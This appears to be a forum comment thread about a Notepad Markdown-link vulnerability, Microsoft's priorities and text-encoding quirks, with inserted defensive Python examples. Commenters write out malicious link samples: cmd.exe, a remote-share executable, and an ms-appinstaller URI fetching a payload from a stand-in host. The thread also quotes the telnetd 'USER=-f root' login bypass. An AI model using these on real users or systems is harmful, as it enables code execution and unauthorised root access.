https://www.microsoft.com/investor/reports/ar25/index.html#
I can only think that they do not even care about Windows anymore, let alone Notepad...
Most of M$ office software has alternatives (Google Docs, OpenOffice...), M$ has no AI model and no AI labs to speak of, Github is constantly crashing and burning, Azure is garbage, and they utterly killed Xbox.
Oh and Linkedin is for actual psychopaths.
If Windows dies, all of their other junk that is attached to the platform will die as well.
What's delusional is making unsubstantiated claims and then dismissing any counterarguments before they're made.
> Most of M$ office software has alternatives (Google Docs, OpenOffice...)
True. Yet MS Office is still the de facto standard.
> Github is constantly crashing and burning
True. But that doesn't mean it isn't still a business strategy for MS.
> Azure is garbage
Also true. But that doesn't mean it isn't profitable: "Microsoft Cloud revenue increased 23% to $168.9 billion."
> and they utterly killed Xbox
Quite the opposite. Xbox is thriving: "Xbox content and services revenue increased 16%."
> Oh and Linkedin is for actual psychopaths.
That's subjective. And even if it were true, that's got nothing to do with profitability (e.g. look at Facebook).
> If Windows dies, all of their other junk that is attached to the platform will die as well.
First off, literally no-one is claiming Windows is going to "die".
Secondly, even if it were to "die", you've provided no evidence why their other revenue streams wouldn't succeed when it's already been demonstrated that those revenue streams are growing, and in some cases, have already overtaken Windows.
I think they'll do just fine if Windows dies on the vine. They'll keep selling all the same software; even for PC gaming they already have their titles on Steam.
The evidence in TFA is that Microsoft is much more than Windows. So much more in fact that one can make a very reasonable argument that it's no longer a top priority for them.
The delusion is shutting your eyes, covering your ears, and screaming about how literally everyone except you is wrong.
The data putting Windows a ways down in revenue is likely correct, but I would argue that losing Windows could mean losing the others as well. Windows is their funnel to most other offerings (currently). Why is MS Office the standard? Why is Azure used? I know for certain that many purchases of Office and Azure were made because of legacy corporate policy of basing IT around Windows/AD. If everyone switched to Linux or MacOS, a lot of seemingly separate Microsoft products would probably die as a downstream effect.
This is true. Peruse r/LinkedinLunatics to see them in action
https://msrc.microsoft.com/update-guide/vulnerability/CVE-20...
> An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files.
Notepad? Link handling?
That's like my pencil having a CVE that's to do with how it loads the ink. That old saying about 'if Microsoft built a car' is more true now than it was then: https://www.snopes.com/fact-check/car-balk/
Calculator hasn't been infiltrated by Copilot yet, but I'm sure the day is coming.
You're the preinstalled calculator!! You don't have to compete with other apps!!
1. Note about blah 2. Paste link to blah 3. Open that link later when reviewing my notes.
Blah is sometimes a web link, sometimes a link to a doc on my system, and sometimes a link to an item in my todo tracker. The better analogy is this is like a pencil having an eraser built in.
I use Drafts instead of Notepad, but if I used Notepad I would want to be able to easily open links in my notes. When I do find myself in Notepad, it's because I double clicked on a readme file that often contains links to resources I need.
If your computer was working, there was never really supposed to be a reason to invoke Notepad. Programmers were expected to install IDEs or third-party text-editor software. Microsoft's own READMEs have always been .rtfs ever since Windows 95. And so on. For a little while, you might use it to view system log files? But the Windows NT lineage gave Windows an Event subsystem with its own MMC-based console, so even that didn't require Notepad any more.
It's therefore bizarre that Microsoft have decided to "enhance" Notepad into this pseudo-rich-text thing, while also sunsetting Wordpad; when it seems like what they really wanted was to "enhance" Wordpad to also do what Notepad does, while sunsetting Notepad. (Even with full back-compat, they could have done this by making Notepad.exe a stub that launched Wordpad.exe with flags.)
> Occasionally, for no reason, your car would lock you out and refuse to let you in until you simultaneously lifted the door handle, turned the key, and grabbed the radio antenna.
> Every time GM introduced a new model, car buyers would have to learn how to drive all over again because none of the controls would operate in the same manner as the old car.
> You would press the 'start' button to shut off the engine.
If you live long enough, satire eventually becomes reality.
Even though I’m all against feature bloat, I think that making Markdown hyperlinks clickable is still within the Overton window of what a simple editor should be doing.
If you want Markdown use VSCode, it is a first class citizen. Don't take an intentionally stripped down text editor and bolt on VSCode-like features.
Because, almost entirely, the software development industry has disclaimed all responsibility. It's super common for people to try to do shit they have no experience or skill at, push their effort to be adopted by others, then when it crashes and burns they have no accountability. If software "engineers" adopted the rigors and accountability and dignity of traditional engineering, the industry would be very different.
It feels like a plague of ignorance and enshittification has silently taken over everything.
Markdown is more properly understood as a family of related-but-mutually-incompatible standards, like CSV, and like "supporting CSV" is a lot more complicated than meets the eye. And supporting Markdown is already clearly non-trivial compared to the baseline of Notepad we've come to expect over the past few decades.
The problem is that overall we seem to have fumbled both the concept and the implementation. There a bunch of vaguely similar but incompatible markdowns and apparently rendering them is too hard and people immediately reach for an enormous pile of software (usually a web stack) to render it for them.
It should have been entirely possible for a person to write a markdown parser in a couple hours and e.g. render paragraphs, bulleted lists and tables into a terminal.
You may be struggling a bit because you are reading some sort of moralization into the statement, some sort of emotional judgment, but there isn't any. It is clear that there does not exist a function that takes a span of "Markdown text" in and emits an abstract syntax tree that everyone agrees upon [1]. That's a fairly mathematical way of putting it, but even from an engineering point of view, the differences matter. Very quickly. It's not like you need to reach deep into crazy syntax to get to real, concrete disagreements between systems, you can hit problems with something as simple as
"_hello world _"
between the systems where they will do substantially different things. There are literally dozens of markdown formats now.
How we got there, why such a thing exists, as interesting as those questions may be none of them change the reality on the ground. There is no universal markdown to be appealed to. The closest is CommonMark, and that explicitly exists precisely because there was no consensus in the first place. If markdown was a format, CommonMark would never have been created.
[1]: Nor does its inverse, which at times is more frustrating to me than this. I have in mind what I want to do and either can't figure out how to do it or it simply can't be done.
But seriously though, all those weird markdown formats could easily just have their own custom parsers that then translate into the common format--supposing the common format is the union of all their features.
There's also a pretty large jump between "I can ask the system to open this link in the default browser" and "I have built my own link handling in a memory-unsafe language to support some really fringe features, and oops it's exploitable"
Replace Notepad with Chrome or Edge - clicking on a link downloads content from the Internet! Oh noes!
"An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files." https://msrc.microsoft.com/update-guide/vulnerability/CVE-20...
Imagine some Markdown:
[link](https://badsite.com)
[link](file://C:/windows/system32/cmd.exe)
[link](file://\\1.2.3.4\share\foo.exe)
[link](ms-appinstaller://?source=https://badsite.com/bad.appx)
Wordpad, Notepad++ and many others highlight and let you double-click the URL in the first three lines, and yes they use the shell to open cmd.exe, yes they open remote shares (which if they're properly remote, the shell throws up a warning prompt asking if you want to connect). Wordpad always prompts if you want to open the link (and shows the link) before doing it, but you can click "Yes". What's beyond the pale is that MS's new Notepad highlighted custom URIs like the fourth link, and let you click to open it without a prompt. Even web browsers will prompt at least once with a special modal dialogue, the first time you click on a link to a custom URI. For safety, a text editor should stick to highlighting http/https/file URIs only.
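As an added illustration of the policy described above (not Notepad's code, nor any editor's), here is a small Python classifier that scans Markdown inline links and decides per target: http/https opens, file targets (local or remote share) always get a prompt, anything with a custom scheme is not treated as a link. The regex, the scheme rules and the sample document are constructed for this example; the sample reuses the targets quoted in this thread plus the README-in-a-zip relative link mentioned further down.

```python
import re

# Inline Markdown link [text](target); image links (![alt](src)) are skipped.
# Constructed regex for this example; it does not handle reference-style links.
LINK_RE = re.compile(r"(?<!!)\[([^\]]*)\]\(([^)\s]+)\)")
# RFC 3986 scheme syntax: letter followed by letters, digits, '+', '.' or '-'.
SCHEME_RE = re.compile(r"[A-Za-z][A-Za-z0-9+.\-]*")


def classify_link(target: str) -> tuple:
    """Return (action, kind) for one link target.

    action: 'open'   -> safe to open directly (web link)
            'prompt' -> only after the user confirms (any file target)
            'block'  -> not treated as a link at all (custom URI scheme)
    """
    scheme, sep, rest = target.partition(":")
    if not sep or not SCHEME_RE.fullmatch(scheme):
        # No scheme: a relative path such as subfolder\virus.exe next to the README.
        return "prompt", "local-file"
    scheme = scheme.lower()
    if scheme in ("http", "https"):
        return "open", "web"
    if len(scheme) == 1:
        # A single letter before ':' is a Windows drive, e.g. C:\windows\system32\...
        return "prompt", "local-file"
    if scheme == "file":
        if rest.startswith("//"):
            # Authority part sits between '//' and the next '/'. Backslashes are kept
            # so a UNC target like file://\\host\share is recognised as remote.
            authority = rest[2:].split("/", 1)[0]
            is_local = (
                authority == ""
                or authority.lower() == "localhost"
                or re.fullmatch(r"[A-Za-z]:", authority) is not None
            )
            if authority.startswith("\\\\") or not is_local:
                return "prompt", "remote-share"
        return "prompt", "local-file"
    # ms-appinstaller:, search-ms:, mailto: and every other scheme end up here.
    return "block", "custom-scheme"


def scan_markdown(text: str) -> list:
    """Return [(link_text, target, action, kind)] for every inline link in a document."""
    results = []
    for match in LINK_RE.finditer(text):
        link_text, target = match.group(1), match.group(2)
        action, kind = classify_link(target)
        results.append((link_text, target, action, kind))
    return results


# Constructed sample document: the four targets quoted in the thread, the relative
# link from the README-in-a-zip scenario, and an image that must be ignored.
SAMPLE_MARKDOWN = r"""
[link](https://badsite.com)
[link](file://C:/windows/system32/cmd.exe)
[link](file://\\1.2.3.4\share\foo.exe)
[link](ms-appinstaller://?source=https://badsite.com/bad.appx)
this project requires [some-other-project](subfolder\virus.exe)
![logo](https://example.invalid/logo.png)
"""

if __name__ == "__main__":
    for link_text, target, action, kind in scan_markdown(SAMPLE_MARKDOWN):
        print(f"{action:6} {kind:13} {target}")
```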
That's the "RCE", in the same way that telling a Linux user to type "curl | sudo bash" in their shell is "RCE".
The fix is that clicking the link now gives a dialogue box asking if you really want to click it, and remember to click no if you're not sure.
Anyway, what this now has me thinking is, should protecting against this be expected to be done per-app or should it be at the OS level? It seems like it would make more sense to have the OS keep records on what application is allowed to open what kinds of links. Maybe with some mechanism to allow the app to cooperate with the OS if they want finer-grained permissions (such as a chat app passing the poster's user ID to the OS when invoking the link, so you could set an 'always allow' rule for links from specific users rather than the full app).
MS has WordPad... fck around with that to make it support markdown or whatever else beyond rtf you want it to support. For that matter, it's probably that much more appropriate to do so.
Do I typically use Notepad, no.. not really... I actually use the new rust based edit terminal app more than Notepad. That said, I expect notepad to do one thing... edit text files, and to not break doing so. The ONLY* addition that might be acceptable would be a HEX Editor mode, so you can edit any file.
There are maybe 5-7 applications in Windows I expect to never break... task manager, notepad, registry editor, file explorer, command prompt are at the top of that list... these are the golden tools that should never fail, even if everything else does.
I'm not sure if it's possible to get rid of the nag banner. And even if it is possible to get rid of it temporarily, it's probably not possible to get rid of it permanently.
I will find out...
Like, if I have a h2 or url, its going to show as special text rather than the h2 tag?
I mean... other than it creating vulnerability... and maybe is the beginning of the end of notepad as a plain text editor...
Is this not a problem with anything that offers a preview of markdown (or HTML, or anything with embedded links)?
And the problem is a notepad app is expected to be dead simple, have few features, and be hard to get wrong while implementing.
1. You can use UNC paths to access remote servers via SMB
2. Even if it's local, it's still more useful than you make it out to be. For instance, suppose you downloaded a .zip file of some github project. The .zip file contains virus.exe buried in some subfolder, and there's a README.md at the root. You open the README.md and see a link (e.g. "this project requires [some-other-project](subfolder\virus.exe)". You click on that and virus.exe gets executed.
Relevant article from The Old New Thing: https://devblogs.microsoft.com/oldnewthing/20060509-30/?p=31...
Programs (this is true for most mainstream operating systems) can become network facing without realizing it. I've sometimes found that a bunch of Windows programs tend to assume that I/O completes "instantly" (even if async I/O has been common on Windows for a very long time) and don't have a good UX for cancelling long running I/O operations
[Free AI credits](C:\windows\system32\logoff.exe)
It works. This is a real exploit that you could do things with. No bold text, italics, bullet points, invisible html.. Just get the text and can copy it to paste again somewhere else.
Ala Cmd+Shift+V on Mac
ETA: I only noticed yesterday because a "sponsored suggestion" popped up when I was typing, which I've not seen before. So either they actually enabled it recently, or advertisers don't bid on the kinds of things I usually type.
I've always had a suspicion that even with auto complete off, some sort of telemetry or obscure feature is still leaking browser address bar text.
ctrl-l is for the address box
The most I want the address box to do is look up a dns name. Which can still be a risk if I were to hit "enter" with sensitive information which could in some cases get pushed out to my DNS provider (which is me, but then it's possible the address would be pushed out to another resolver, and will also be logged in an unexpected place)
Amazingly still works on Win 11 and still seems to keep it local (bypassing the windows search), so I'm pleased to report consistent results for 30 ish years.
Of course, now I've mentioned it out loud, it'll be the next thing to go...
I don't know if it's just me being old and grumpy, but everything windows 8 and later (server 2003) seems like half-baked, unfinished enshittification. Trying to do something even vaguely "advanced" to a network adapter puts me back in windows 95 land along with the run box. The "manage" pane with device & disk manager and logs is from a totally bygone era yet it seems to still be the only way of getting that information. The worst bit is, I'm not complaining. All the bits that look and feel like they've been forgotten since Windows 2000 are the easiest, least infuriating bits of the system I interact with.
Obsidian has a mildly infuriating default of opening previews with ctrl shift v keys instead of pasting with no formatting.
Did you implement .LOG and Unicode support with BOM handling?
The windows 7-10 versions that could open anything would just get stuck for half an hour when you opened the wrong thing in them, which was rather annoying.
Bonus point: that Windows 95 style "error" beep when pasting too large image. Always sends the shiver down the spine and confuses the coworkers around (we're an all-Mac shop).
Windows 11 also takes a huge amount of time to get working as I intend. I have to remove a lot of 'features' and heavily optimize some processes. It's stable and it works, but I'm getting more and more annoyed by it that upcoming updates sometimes destroy all my effort.
Kinda wish I could run everything my family wants on Debian. I know I could do that right now, but the wife and kids will never get used to that if they have to use Microsoft products in their working and school life.
You won't know until you try. My mum used all versions of Windows from 3.1 till Windows 7. She hated Windows 8, and that's when I decided to switch her to Linux (with XFCE) - and she felt the UI was a lot more familiar to her than Windows 8. I recently showed her a few screenshots of Windows 11, and she finds her current desktop (now on KDE) a lot more familiar than Windows 11. Same with Office, she prefers the older style toolbar of LibreOffice to the ribbon UI of modern versions of Office.
So maybe install it on a spare device as a trial and see how they like it?
The Web versions of Office, err MS 365, err CoPilot App.. (OMG!>!!>) ... aren't so bad to use in a Linux browser either.
Google Docs works fine for me in Firefox as well.
But some things just don’t run there (properly).
Like Assetto Corsa EVO or SimHub.
[1] https://www.protondb.com/app/3058630 [2] https://www.simhubdash.com/community-2/simhub-support/guide-...
But… ACC EVO is alpha at the moment. It barely runs without bugs on Windows. It’s just less hassle on Windows.
https://gs.statcounter.com/windows-version-market-share/desk...
Not sure what caused the inflection point in December 2025.
Better to have no alpha-transparency than whatever this is. At least old Paint just turned it white, and you could manipulate the white layer, with this working with the alpha layer is a nightmare.
I try to use Pinta/Paint.Net, but it's not quite as good as I remember psp being. I don't even hate the newer MS Paint... though I'm only on Windows for my work environment and even then.
Aside: I've been using my personal computer more, so I can work on a limited surface with docker and ai agent, then just bring in the components I'm working on when ready. My work environment is really locked down, no wsl, no docker... and it's like working in 2002 to some extent... It's literally easier for me to create stand-alone projects, work on a given feature in complete isolation... AI agent mostly to boilerplate the environment and most of the automated sanity tests, then I can focus on just what I'm working on.
I copied out mspaint.exe and some resource files as well were needed.
It runs for me without error.
Update - it's just the games; I thought it had notepad and calc as well
It's because the program just calls a Windows API to display the version dialog of Windows itself.
[0] In the unlikely case that it isn’t there, you can add it through System > Optional Features > Add an optional feature.
By using a version that is _that_ old you do lose out on some of the actually useful updates legacy notepad received, such as LF line ending support.
Most of the features that were added in later versions: unicode, tabs, auto-reload, support for large files. CTRL+S is also nice.
AI! It needs AI. Did I guess it right?
For many built in windows apps, the 'about this program' menu item just invokes a separate program, 'winver'. If you go Start -> Run and type in winver, it does the same thing.
Wordpad was the same but a rich text editor control.
There’s very little need for it to have ever become more.
https://github.com/christian-korneck/classic-windows-notepad
Extract both the ISO and reactos.cab with 7zip.
This has prompted me to move on from Notepad++ - it's sad, because I've used it for many years, but this is too much.
One could argue it's an issue with windows where you can't just pull updates using a package manager/app store.
But I guess that's what you get when you fragment your ecosystem in apt, snap and gnome extension manager. I need to master nix asap.
Ok, tabs, I do like the tabs.
At this point, what am I supposed to do other than uninstall Windows completely? No real sandboxing, a mountain of legacy…
Windows is just a mountain of shit.
telnetd CVE-2026-24061. It's embarrassingly simple exploit but took years to be discovered.
> When telnetd invokes /usr/bin/login, it passes the USER value directly. If an attacker sets USER=-f root and connects using telnet -a or --login, the login process interprets -f root as a flag to bypass authentication, granting immediate root shell access.
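The root cause quoted above is an untrusted value landing in an argv slot where the called program also accepts options. As an added example (constructed here, not telnetd's or login's code; the `/usr/bin/login` path and the argv shape are assumptions), this is the check a daemon should make before forwarding such a value:

```python
import re

# POSIX portable username: letter or underscore first, then letters, digits,
# underscore or hyphen, optional trailing '$'. A leading '-' can never match,
# so anything that argv parsing would read as a flag is rejected up front.
USERNAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_-]*\$?")


def looks_like_option(value: str) -> bool:
    """True if a value placed in its own argv slot would be parsed as an option."""
    return value.startswith("-")


def build_login_argv(user: str, login_path: str = "/usr/bin/login") -> list:
    """Build argv for an authenticating helper from an untrusted USER value.

    Raises ValueError instead of forwarding a value that fails the username
    syntax or would be read as an option by the callee.
    """
    if looks_like_option(user) or not USERNAME_RE.fullmatch(user):
        raise ValueError(f"refusing to forward untrusted user value {user!r}")
    return [login_path, user]


def is_safe_user_value(user: str) -> bool:
    """Convenience wrapper: does this USER value pass the validation above?"""
    try:
        build_login_argv(user)
    except ValueError:
        return False
    return True
```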
Why does every Linux distro under the sun try so hard to protect the garbage under /usr/bin/ and /etc/ when literally the only files that matter to me are in /home, which is a free-for-all?
As for the desktop community… Well, it has a severe lack of professionals.
Because a compromised user could infect shared executables and spread the infection. A bit harder to do with etc but for sure possible. The main target would be infecting bash and you are done from the get go.
>when literally the only files that matter to me are in /home, which is a free-for-all?
The home folder's read write is usually restricted to the user. The only scenario where this isn't the case to my knowledge is Ubuntu where others can read it, but this is just a huge flaw in Ubuntu that almost no other distro has.
> The home folder's read write is usually restricted to the user.
Yeah, and that is the point. All the user's programs including curl, wget, the web browser, anything else that connects to the network run as the user, and all the user's programs, by default, have access to everything inside ${HOME}.
Most people don't really care if /bin gets obliterated, but they do care dearly when /home/joe/photos/annies-2nd-birthday gets wiped.
You can always have two user accounts: oblio and unsafe-oblio and have a shared folder between the two for transferring files. Or invest into some backup software.
And no, it's not "a lot of work" it's the bare minimum
We have supposedly all the smartest minds in the world working in tech and they haven't been able to create a simple, cheap, reliable cross platform solution for user data protection, backup and restore.
It's easier to blame users instead.
Yes, because the users are in fact the problem. The options are either to trust the user to make decisions (and technically illiterate users will screw things up for themselves), or lock down the system so that the user isn't allowed to do anything the corporate overlord doesn't let them. There is no middle ground.
Provide more education and guidance for users and more corporate controls.
If they would have really started to do this in 2005, we would have been there by now. Instead we get more UI toolkits and more UI refreshes and AI everywhere.
I even signed it and everything.
I always thought Americans were "nanny state this, nanny state that". Doesn't this also apply to huge state sized corporations mandating a cut of every app sold and forcing everyone to only install apps from them?
Oh, what do you mean there's also SELinux, Snap, Flatpak, Docker, Podman, ...?
https://github.com/microsoft/edit
Yeah, it's a re-creation of edit, but it's pretty great... also runs outside windows.
Uninstall Windows completely 4 years ago when Windows 11 was released heralding in a new era of absolutely insane, self-destructive, unnecessary and unwanted shit?
There is no valid excuse for this vulnerability. Its existence is a category error that's only possible because Microsoft has completely jumped the shark. Continuing to use /any/ of their products is a choice to accept pure insanity as a default.
You have:
- Windows Sandbox (consumer-level sandbox)
- Creating a separate User (User folders are permission locked to their user by default, system binaries cannot be modified without admin access)
- HyperV (VM hypervisor)
- Edge Browsers
Don't get me wrong MSFT quality is dropping steeply, but this is still a strong point. For comparison, on Ubuntu, user folder by default can be read by all users.
Common practice, and even encouraged by Windows itself, is having the administrator account be the only account. This misuse is a very common thread in Windows systems, and security breaches alike.
Many Linux distros are also guilty of this, disabling the root account by default and having the only user have sudo privileges, just like Windows.
This hasn't been true since Vista. Kind of even before that with XP, it really showcased using multiple accounts to home users with a much more stylized user selection screen.
For nearly thirty years, notepad.exe was the gold standard for a "dumb" utility which was a simple, win32-backed buffer for strings that did exactly one thing...display text. An 8.8 CVSS on a utility meant for viewing data is a fundamental failure of the principle of least privilege.
At some point, they need to stop asking "can we add this feature?" and start asking "does this text editor need a network-aware rendering stack?"
They didn’t stop there. They also asked “does this need AI?” and came up with the wrong answer.
Microsoft’s product managers however have no imagination, and so they insist on just mindlessly shoving obnoxious Copilot buttons everywhere.
> How do I add more features to get a promotion
- Successfully led key efforts to modernize aging platform technologies
- Directed integration of cutting-edge system-wide artificial intelligence functionality
Gee thanks for helping me find the button I'll use literally once and making me hunt for the one I'll need the other 99999 times I use this service.
Existing users can go fuck themselves as long as new people are registering. Line go up!
It's easy to say you will, and very hard to actually do it.
In life you have to choose your battles.
Because the society in US is arranged as a competition with no safety net and where your employer has a disproportionate amount of influence on your well being and the happiness of your kids.
I'm not going to give up $1M in total comp and excellent insurance for my family because you and I don't like where AI is going.
I'll have to explain it to the wife: "well, you see, we can't live in this house anymore because AI in Notepad was just too much".
I'll dial up my ethical and moral stance on software up to 11 when I see a proper social safety net in this country, with free healthcare and free education.
And if we can't all agree on having even those vital things for free, then relying on collective agreement on software issues will never work in practice so my sacrifice would be for nothing. I would just end up being the dumb idealist.
I don't think you should make any change you don't want to, I'm not arguing for collective agreement on anything, and I'm not convinced there's a big ethical case for or against AI, even in Notepad.exe. If you can make $1M, go nuts, I just think it's not a great example of dealing with ethics & tradeoffs.
I was more just reacting to the contrast between ideas early in this thread, and your implication of a $1M comp. Early in the thread there was implication that poor/exploited/low-level workers with few other options were either being blamed for AI in notepad, or should not be blamed. Then you casually drop the $1M comp line. Maybe that's real, maybe it's not but regardless, it felt silly to compare the earlier population with people who can or have made $1M. Of course we all face challenges, and the hedonic treadmill calls for us equally at $1K/year and $1M/year, I just think people in the latter have objectively more options, even if the wife complains, than people in the former, and it's tough to take the latter seriously when they talk about lifestyle adjustments.
There is always someone who will take advantage of the prisoners dilemma.
Well, except that this did not prevent it from having embarrassing bugs. Google "Bush hid the facts" for an example. I'm serious, you won't be disappointed.
I think complexity is relative. At the time of the "Bush hid the facts" bug, nailing down Unicode and text encodings was still considered rocket science. Now this is a solved problem and we have other battles we fight.
> and we have other battles we fight.
Except no, we don't. notepad.exe was DONE SOFTWARE. It was feature complete. It didn't have to change. This is not a battle that needed fighting, this was hitting a brick wall with ones fist for no good reason, and then complaining about the resulting pain.
https://en.wikipedia.org/wiki/Windows_Notepad#Change_in_deve... https://en.wikipedia.org/wiki/WordPad#Discontinuation
They likely knew nobody would be drawn to WordPad by the additions, so they had to scavenge their rapidly diminishing list of actually useful software for sacrifices on the altar to their outrageous AI investments.
This definition in the first paragraph on Wikipedia matches my understanding of it as a security consultant:
> The ability to trigger arbitrary code execution over a network (especially via a wide-area network such as the Internet) is often referred to as remote code execution (RCE or RCX). --https://en.wikipedia.org/wiki/Arbitrary_code_execution
Issues in handling local files, whether they require user interaction or not, are just that
Doesn't take away from the absurdity that notepad isn't a notepad but does extensive file contents parsing
While the 8.8 score is embarrassing, by no measure was notepad done software. It couldn't load a large text file for one, its search was barely functional, it had funky issues with encoding, etc.
Notepad++ is closer to what should be expected from an OS basic text editor
Also, I hope the irony of you citing Notepad++ [1] as what Notepad should aim to be isn't lost on you. My point being, these kinds of vulnerabilities shouldn't exist in a fucking text editor.
[1] https://notepad-plus-plus.org/news/hijacked-incident-info-up...
Regarding large, I am referring to log files for example. I think the issue was lack of use of memory mapped files, which meant the entire file was loaded to RAM always, often giving the frozen window experience
Remote into a machine that you're not allowed to copy data out of. You only have the utilities baked into Windows and whatever the validated CI/CD process put there. You need to open a log file that has ballooned to at least several hundred megabytes, maybe more.
Moby Dick is about 1MB of text. That's really not much compared to a lot of log files on pretty hot servers.
I do agree though, if we're going to be complaining about how a text editor could have security issues and pointing to Notepad++ as an example otherwise, it's had its own share of notable vulnerabilities even before this update hijacking. CVE-2017-8803 had a code execution vulnerability on just opening a malicious file, this at least requires you to click the rendered link in a markdown file.
Honestly I'm okay with having to resort to power tools for these edge cases. Notepad is more for the average user who is less likely to run into 100 MB text files and more likely to run into a 2 kB text file someone shared on Discord.
There's no reason it shouldn't handle both use cases.
I get what you're saying. But if things were done right I probably wouldn't have to be remoting into this box to hunt for a log file that wasn't properly being shipped to some other centralized logging platform.
Plus for many years Word was one of the main cash cows for MS, so they didn't want to make an editor that would take away from Word.
And you could see how adding new things adds vulnerabilities. In this case they added ability to see/render markdown and with markdown they render links, which in this case allowed executing remote code when user clicks on a link.
Wordpad was the bundled rich text editor and was also a mess
I don't think an improved notepad could have cannibalized Word
Notepad++ is a monster software.
It was working according to the spec. Which is very unusual in the SW world.
I wish…
Detecting text encoding is only easy if all you need to contend with is UTF16-with-BOM, UTF8-with-BOM, UTF8-without-BOM, and plain ASCII (which is effectively also UTF8). As soon as you might see UTF16 or UCS without a BOM, or 8-bit codepages other than plain ASCII (many apps/libs assume that these are always CP1252, a superset of the printable characters of ISO-8859-1, which may not be the case), things are not fully deterministic.
Thankfully UTF8 has largely won out over the many 8-bit encodings, but that leaves the interesting case of UTF8-with-BOM. The standard recommends against using it, that plain UTF8 is the way to go, but to get Excel to correctly load a UTF8 encoded CSV or similar you must include the BOM (otherwise it assumes CP 1252 and characters above 127 are corrupted). But… some apps/libs are completely unaware that UTF8-with-BOM is a thing at all so they load such files with the first column header corrupted.
Source: we have clients pushing & pulling (or having us push/pull) data back & forth in various CSV formats, and we see some oddities in what we receive and what we are expected to send more regularly than you might think. The real fun comes when something at the client's end processes text badly (multiple steps with more than one of them incorrectly reading UTF8 as CP1252, for example) before we get hold of it, and we have to convince them that what they have sent is non-deterministically corrupt and we can't reliably fix it on the receiving end…
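As an added example (not from the thread), here is the BOM sniffing and the "first column header corrupted" failure mode described above, plus the single-misread UTF-8-as-CP1252 mojibake and its reversal. The sample CSV bytes and all function names are constructed for this example.

```python
# Added example: BOM-based encoding detection for text/CSV input and the
# failure modes the thread describes. Sample data is constructed here.
import codecs
import csv
import io


def sniff_encoding(data):
    """Return a Python codec name chosen from a leading byte-order mark.

    Check UTF-32 before UTF-16: the UTF-32 LE BOM (FF FE 00 00) starts
    with the UTF-16 LE BOM (FF FE). Without a BOM, strict UTF-8 decoding
    is tried first because UTF-8 is sparse (random 8-bit text rarely
    validates); the CP1252 fallback is an assumption, not a detection.
    """
    if data.startswith(codecs.BOM_UTF8):
        return "utf-8-sig"          # decoder strips the BOM for us
    if data.startswith((codecs.BOM_UTF32_LE, codecs.BOM_UTF32_BE)):
        return "utf-32"
    if data.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return "utf-16"
    try:
        data.decode("utf-8")
        return "utf-8"
    except UnicodeDecodeError:
        return "cp1252"             # guess; cannot be made deterministic


def read_header(data, encoding):
    """Decode the file with the given codec and return its header row."""
    text = data.decode(encoding)
    return next(csv.reader(io.StringIO(text)))


def misread_as_cp1252(text):
    """Simulate a tool that reads UTF-8 bytes as CP1252 (one mojibake step)."""
    return text.encode("utf-8").decode("cp1252")


def repair_single_misread(text):
    """Undo exactly one UTF-8-as-CP1252 misread. A second misread on the
    sender's side, or any byte that CP1252 leaves undefined, makes this
    ambiguous, which is why such files cannot be fixed reliably downstream."""
    return text.encode("cp1252").decode("utf-8")


# Constructed sample: a UTF-8 CSV written with a BOM (what Excel needs).
SAMPLE_CSV = codecs.BOM_UTF8 + "name,city\nJosé,Zürich\n".encode("utf-8")

if __name__ == "__main__":
    # A BOM-unaware reader keeps U+FEFF glued to the first header field.
    print(read_header(SAMPLE_CSV, "utf-8"))                 # ['\ufeffname', 'city']
    print(read_header(SAMPLE_CSV, sniff_encoding(SAMPLE_CSV)))  # ['name', 'city']
    print(misread_as_cp1252("José"))                        # JosÃ©
    print(repair_single_misread(misread_as_cp1252("José"))) # José
```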
Ah so that’s the trick! I’ve run into this problem a bunch of times in the wild, where some script emits CSV which works on the developer's machine but fails strangely with real-world data.
Good to know there’s a simple solution. I hope I remember your comment next time I see this!
Due to (parts of?) the EU using the comma as the decimal separator, you have to use another symbol to separate your values.
It wouldn't normally necessitate not using comma as the field separator in CSV files though; wrapping those values in quotes is how that would usually be handled in my experience.
Though many people end up switching to “our way”, despite their normal locale preferences, because of compatibility issues they encounter otherwise with US/UK software written naively.
Unfortunately people like CSV to be at least part way human-readable, which means readable delimiters, end-of-record markers being EOLs that a text editor would understand, and the decimal/thousand/currency symbols & date formatting that they are used to.
In the text files we get from clients we sometimes see tab used instead of comma, or pipe. I don't think we've seen semicolon yet, though our standard file interpreter would quietly cope¹ as long as there is nothing really odd in the header row.
--------
[1] it uses the heuristic “the most common non-alpha-numeric non-space non-quote character found in the header row” to detect the separator used if it isn't explicitly told what to expect
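The footnote's separator heuristic as an added example (not the commenter's interpreter): the naive version counts every non-alphanumeric, non-space, non-quote character in the header row, and the second version shows one way to survive the "something odd in the header row" case by only counting a candidate set. Function names and sample headers are constructed here.

```python
# Added example: detecting a CSV field separator from the header row.
from collections import Counter


def _is_separator_candidate(ch):
    """Characters the thread's heuristic counts: not alphanumeric, not a
    space, not a quote. Tab counts, since it is a common real separator."""
    return not (ch.isalnum() or ch == " " or ch in "\"'")


def detect_separator_naive(header_line, default=","):
    """Most common eligible character in the header row (ties: first seen)."""
    counts = Counter(ch for ch in header_line.rstrip("\r\n")
                     if _is_separator_candidate(ch))
    return counts.most_common(1)[0][0] if counts else default


def detect_separator(header_line, candidates=",;\t|", default=","):
    """Same idea, but only characters in `candidates` are counted, so an
    underscore-heavy header like first_name,last_name no longer wins."""
    counts = Counter(ch for ch in header_line.rstrip("\r\n")
                     if ch in candidates)
    return counts.most_common(1)[0][0] if counts else default


def split_header(header_line, separator=None):
    """Split a header row using the detected (or given) separator."""
    sep = separator or detect_separator(header_line)
    return header_line.rstrip("\r\n").split(sep)


if __name__ == "__main__":
    # Constructed header rows in the styles the thread mentions.
    for hdr in ("name,city,amount", "name;city;amount",
                "name\tcity\tamount", "name|city|amount"):
        print(repr(detect_separator_naive(hdr)), split_header(hdr))
    # The odd-header case: three underscores beat two commas.
    odd = "first_name,last_name,home_city"
    print(repr(detect_separator_naive(odd)))   # '_'  (wrong)
    print(repr(detect_separator(odd)))         # ','  (candidate set helps)
```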
It's maddening and it's frustrating. The US doesn't have any of these issues, but in Europe, that's a complete mess!
Adding a BOM makes it incompatible with ASCII, which is one of the benefits of using UTF-8.
